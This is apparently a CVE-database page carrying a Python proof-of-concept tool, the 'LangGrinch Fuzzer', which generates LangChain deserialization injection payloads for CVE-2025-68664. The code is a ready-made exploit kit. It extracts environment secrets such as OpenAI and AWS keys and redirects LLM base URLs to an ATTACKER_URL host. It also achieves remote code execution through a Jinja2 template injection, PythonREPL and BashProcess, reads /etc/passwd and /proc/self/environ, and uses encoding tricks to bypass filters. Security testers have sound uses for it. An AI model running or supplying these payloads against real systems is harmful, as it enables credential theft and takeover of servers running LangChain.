4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / langgrinch_fuzzer.py PY
#!/usr/bin/env python3
"""
🎯 LangGrinch Fuzzer - CVE-2025-68664 Payload Generator & Tester
================================================================

This tool generates and tests LangChain deserialization injection payloads
for authorized security testing purposes only.

Author: Amresh Kumar (Ak-cybe)
CVE: CVE-2025-68664

⚠️ WARNING: Use only on systems you own or have explicit permission to test!
"""

import json
import argparse
import sys
from typing import List, Dict, Any
from dataclasses import dataclass
from enum import Enum


class PayloadCategory(Enum):
    """Payload categories for organized testing"""
    RECON = "reconnaissance"
    SSRF = "ssrf"
    RCE = "rce"
    FILE_READ = "file_read"
    EVASION = "evasion"


@dataclass
class Payload:
    """Represents a single exploit payload"""
    name: str
    category: PayloadCategory
    payload: Dict[str, Any]
    description: str
    risk_level: str  # low, medium, high, critical


class LangGrinchFuzzer:
    """
    LangGrinch Fuzzer - Generate and test CVE-2025-68664 payloads
    """
    
    def __init__(self):
        self.payloads: List[Payload] = []
        self._load_payloads()
    
    def _load_payloads(self):
        """Load all payload definitions"""
        
        # ========== RECONNAISSANCE PAYLOADS ==========
        recon_secrets = [
            ("HOSTNAME", "Server hostname"),
            ("OPENAI_API_KEY", "OpenAI API key"),
            ("AWS_ACCESS_KEY_ID", "AWS access key"),
            ("AWS_SECRET_ACCESS_KEY", "AWS secret key"),
            ("DATABASE_URL", "Database connection string"),
            ("REDIS_URL", "Redis connection URL"),
            ("ANTHROPIC_API_KEY", "Anthropic API key"),
            ("GOOGLE_API_KEY", "Google API key"),
            ("PINECONE_API_KEY", "Pinecone API key"),
            ("HUGGINGFACE_API_TOKEN", "HuggingFace token"),
            ("LANGCHAIN_API_KEY", "LangChain API key"),
            ("PATH", "System PATH variable"),
            ("HOME", "Home directory"),
            ("USER", "Current user"),
            ("JWT_SECRET", "JWT secret key"),
        ]
        
        for env_var, desc in recon_secrets:
            self.payloads.append(Payload(
                name=f"Secret Extraction: {env_var}",
                category=PayloadCategory.RECON,
                payload={"lc": 1, "type": "secret", "id": [env_var]},
                description=f"Extract {desc} from environment",
                risk_level="medium"
            ))
        
        # Error trigger for stack trace leak
        self.payloads.append(Payload(
            name="Error Trigger (Stack Trace Leak)",
            category=PayloadCategory.RECON,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain", "non_existent_module", "FakeClass"],
                "kwargs": {}
            },
            description="Trigger error to leak version info in stack trace",
            risk_level="low"
        ))
        
        # ========== SSRF PAYLOADS ==========
        ssrf_payloads = [
            {
                "name": "RequestsWrapper SSRF",
                "id": ["langchain_community", "utilities", "requests", "RequestsWrapper"],
                "kwargs": {"headers": {"X-Injected": "true"}}
            },
            {
                "name": "OpenAI Base URL Override",
                "id": ["langchain_community", "llms", "openai", "OpenAI"],
                "kwargs": {"openai_api_base": "http://ATTACKER_URL/", "openai_api_key": "sk-fake"}
            },
            {
                "name": "HuggingFace Endpoint",
                "id": ["langchain_community", "llms", "huggingface_endpoint", "HuggingFaceEndpoint"],
                "kwargs": {"endpoint_url": "http://ATTACKER_URL/webhook"}
            },
            {
                "name": "WebBaseLoader SSRF",
                "id": ["langchain_community", "document_loaders", "web_base", "WebBaseLoader"],
                "kwargs": {"web_path": "http://ATTACKER_URL/ssrf"}
            },
            {
                "name": "Ollama Base URL",
                "id": ["langchain_community", "llms", "ollama", "Ollama"],
                "kwargs": {"base_url": "http://ATTACKER_URL/ollama"}
            },
        ]
        
        for ssrf in ssrf_payloads:
            self.payloads.append(Payload(
                name=ssrf["name"],
                category=PayloadCategory.SSRF,
                payload={
                    "lc": 1,
                    "type": "constructor",
                    "id": ssrf["id"],
                    "kwargs": ssrf["kwargs"]
                },
                description=f"SSRF via {ssrf['name']}",
                risk_level="high"
            ))
        
        # ========== RCE PAYLOADS ==========
        self.payloads.append(Payload(
            name="PythonREPL (Critical)",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_experimental", "utilities", "python", "PythonREPL"],
                "kwargs": {}
            },
            description="Direct Python code execution via REPL",
            risk_level="critical"
        ))
        
        self.payloads.append(Payload(
            name="Jinja2 SSTI - Command Execution",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
                "kwargs": {
                    "template": "{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}",
                    "template_format": "jinja2"
                }
            },
            description="SSTI leading to OS command execution",
            risk_level="critical"
        ))
        
        self.payloads.append(Payload(
            name="BashProcess Execution",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_experimental", "llm_bash", "bash", "BashProcess"],
                "kwargs": {}
            },
            description="Bash command execution",
            risk_level="critical"
        ))
        
        # ========== FILE READ PAYLOADS ==========
        file_read_payloads = [
            {
                "name": "CSVLoader - /etc/passwd",
                "id": ["langchain_community", "document_loaders", "csv_loader", "CSVLoader"],
                "kwargs": {"file_path": "/etc/passwd"}
            },
            {
                "name": "TextLoader - /proc/self/environ",
                "id": ["langchain_community", "document_loaders", "text", "TextLoader"],
                "kwargs": {"file_path": "/proc/self/environ"}
            },
            {
                "name": "JSONLoader - Config",
                "id": ["langchain_community", "document_loaders", "json_loader", "JSONLoader"],
                "kwargs": {"file_path": "/app/config.json", "jq_schema": "."}
            },
        ]
        
        for fr in file_read_payloads:
            self.payloads.append(Payload(
                name=fr["name"],
                category=PayloadCategory.FILE_READ,
                payload={
                    "lc": 1,
                    "type": "constructor",
                    "id": fr["id"],
                    "kwargs": fr["kwargs"]
                },
                description=f"Read file via {fr['name']}",
                risk_level="high"
            ))
        
        # ========== EVASION PAYLOADS ==========
        self.payloads.append(Payload(
            name="Nested Injection",
            category=PayloadCategory.EVASION,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain", "schema", "HumanMessage"],
                "kwargs": {
                    "content": "normal text",
                    "additional_kwargs": {
                        "hidden": {"lc": 1, "type": "secret", "id": ["SECRET_KEY"]}
                    }
                }
            },
            description="Hide payload in nested structure to bypass filters",
            risk_level="medium"
        ))
        
        self.payloads.append(Payload(
            name="Unicode Bypass",
            category=PayloadCategory.EVASION,
            payload={"\u006c\u0063": 1, "type": "secret", "id": ["API_KEY"]},
            description="Use unicode encoding to bypass simple filters",
            risk_level="medium"
        ))
    
    def get_payloads_by_category(self, category: PayloadCategory) -> List[Payload]:
        """Get all payloads of a specific category"""
        return [p for p in self.payloads if p.category == category]
    
    def get_all_payloads(self) -> List[Payload]:
        """Get all payloads"""
        return self.payloads
    
    def generate_payload_json(self, payload: Payload, pretty: bool = True) -> str:
        """Generate JSON string for a payload"""
        if pretty:
            return json.dumps(payload.payload, indent=2)
        return json.dumps(payload.payload)
    
    def export_all_payloads(self, output_file: str = None) -> str:
        """Export all payloads to JSON"""
        export_data = []
        for p in self.payloads:
            export_data.append({
                "name": p.name,
                "category": p.category.value,
                "risk_level": p.risk_level,
                "description": p.description,
                "payload": p.payload
            })
        
        json_output = json.dumps(export_data, indent=2)
        
        if output_file:
            with open(output_file, 'w') as f:
                f.write(json_output)
            print(f"✅ Exported {len(export_data)} payloads to {output_file}")
        
        return json_output
    
    def generate_custom_secret_payload(self, env_var: str) -> Dict[str, Any]:
        """Generate a custom secret extraction payload"""
        return {"lc": 1, "type": "secret", "id": [env_var]}
    
    def generate_custom_ssrf_payload(self, target_url: str) -> Dict[str, Any]:
        """Generate a custom SSRF payload"""
        return {
            "lc": 1,
            "type": "constructor",
            "id": ["langchain_community", "utilities", "requests", "RequestsWrapper"],
            "kwargs": {"headers": {"X-Target": target_url}}
        }


def print_banner():
    """Print the tool banner"""
    banner = """
╔═══════════════════════════════════════════════════════════════════╗
║                                                                   ║
║   ██╗      █████╗ ███╗   ██╗ ██████╗  ██████╗ ██████╗ ██╗███╗   ██║
║   ██║     ██╔══██╗████╗  ██║██╔════╝ ██╔════╝ ██╔══██╗██║████╗  ██║
║   ██║     ███████║██╔██╗ ██║██║  ███╗██║  ███╗██████╔╝██║██╔██╗ ██║
║   ██║     ██╔══██║██║╚██╗██║██║   ██║██║   ██║██╔══██╗██║██║╚██╗██║
║   ███████╗██║  ██║██║ ╚████║╚██████╔╝╚██████╔╝██║  ██║██║██║ ╚████║
║   ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝
║                                                                   ║
║           🎯 LangGrinch Fuzzer - CVE-2025-68664                   ║
║           📝 Author: Amresh Kumar (Ak-cybe)                       ║
║                                                                   ║
╚═══════════════════════════════════════════════════════════════════╝
    """
    print(banner)


def main():
    """Main entry point"""
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="LangGrinch Fuzzer - CVE-2025-68664 Payload Generator",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python langgrinch_fuzzer.py --list                    # List all payloads
  python langgrinch_fuzzer.py --category recon          # Show recon payloads
  python langgrinch_fuzzer.py --export payloads.json    # Export all payloads
  python langgrinch_fuzzer.py --secret MY_API_KEY       # Generate custom secret payload
  python langgrinch_fuzzer.py --ssrf http://webhook.site/xxx  # Generate SSRF payload
        """
    )
    
    parser.add_argument('--list', '-l', action='store_true', 
                        help='List all available payloads')
    parser.add_argument('--category', '-c', type=str,
                        choices=['recon', 'ssrf', 'rce', 'file_read', 'evasion'],
                        help='Filter by payload category')
    parser.add_argument('--export', '-e', type=str,
                        help='Export all payloads to JSON file')
    parser.add_argument('--secret', '-s', type=str,
                        help='Generate custom secret extraction payload')
    parser.add_argument('--ssrf', type=str,
                        help='Generate custom SSRF payload with target URL')
    parser.add_argument('--json', '-j', action='store_true',
                        help='Output in JSON format only (no formatting)')
    
    args = parser.parse_args()
    
    fuzzer = LangGrinchFuzzer()
    
    if args.list:
        print("\n📋 Available Payloads:\n")
        print("-" * 80)
        for i, p in enumerate(fuzzer.get_all_payloads(), 1):
            risk_emoji = {"low": "🟢", "medium": "🟡", "high": "🟠", "critical": "🔴"}
            print(f"{i:2}. [{risk_emoji.get(p.risk_level, '⚪')} {p.risk_level.upper():8}] "
                  f"[{p.category.value:12}] {p.name}")
        print("-" * 80)
        print(f"\n✅ Total: {len(fuzzer.get_all_payloads())} payloads")
        return
    
    if args.category:
        category_map = {
            'recon': PayloadCategory.RECON,
            'ssrf': PayloadCategory.SSRF,
            'rce': PayloadCategory.RCE,
            'file_read': PayloadCategory.FILE_READ,
            'evasion': PayloadCategory.EVASION
        }
        category = category_map[args.category]
        payloads = fuzzer.get_payloads_by_category(category)
        
        print(f"\n📋 {category.value.upper()} Payloads:\n")
        print("-" * 80)
        for p in payloads:
            print(f"\n🎯 {p.name}")
            print(f"   Description: {p.description}")
            print(f"   Risk Level: {p.risk_level}")
            print(f"   Payload:")
            print(fuzzer.generate_payload_json(p))
        print("-" * 80)
        return
    
    if args.export:
        fuzzer.export_all_payloads(args.export)
        return
    
    if args.secret:
        payload = fuzzer.generate_custom_secret_payload(args.secret)
        if args.json:
            print(json.dumps(payload))
        else:
            print(f"\n🔑 Custom Secret Extraction Payload for: {args.secret}\n")
            print(json.dumps(payload, indent=2))
        return
    
    if args.ssrf:
        payload = fuzzer.generate_custom_ssrf_payload(args.ssrf)
        if args.json:
            print(json.dumps(payload))
        else:
            print(f"\n🌐 Custom SSRF Payload for: {args.ssrf}\n")
            print(json.dumps(payload, indent=2))
        return
    
    # Default: show help
    parser.print_help()


if __name__ == "__main__":
    main()